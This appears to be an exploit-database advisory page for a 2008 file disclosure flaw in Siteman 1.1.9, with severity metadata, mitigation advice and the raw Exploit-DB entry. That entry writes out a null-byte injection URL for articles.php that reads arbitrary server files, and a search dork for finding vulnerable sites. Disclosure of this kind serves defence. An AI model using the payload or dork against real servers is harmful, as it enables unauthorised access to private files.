header-logo
Suggest Exploit
vendor:
Siteman
by:
IRCRASH (Dr.Crash)
7.5
CVSS
HIGH
File Disclosure
200
CWE
Product Name: Siteman
Affected Version From: 1.1.2009
Affected Version To: 1.1.2009
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Siteman V:1.1.9 File Disclosure Vulnerability

Siteman Version 1.1.9 is vulnerable to file disclosure. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to view the content of any file on the server.

Mitigation:

Upgrade to the latest version of Siteman or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

#####################################################################################
####             Siteman V:1.1.9 File Disclosure Vulnerability                   ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#                                                                                   #
#Page Address:  http://Sitename/articles.php?do=viewart&id=%00&cat=[file name]%00   #
#                                                                                   #
#                                                                                   #
#Dork : "Siteman Version 1.1.9"                                                     #
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-23]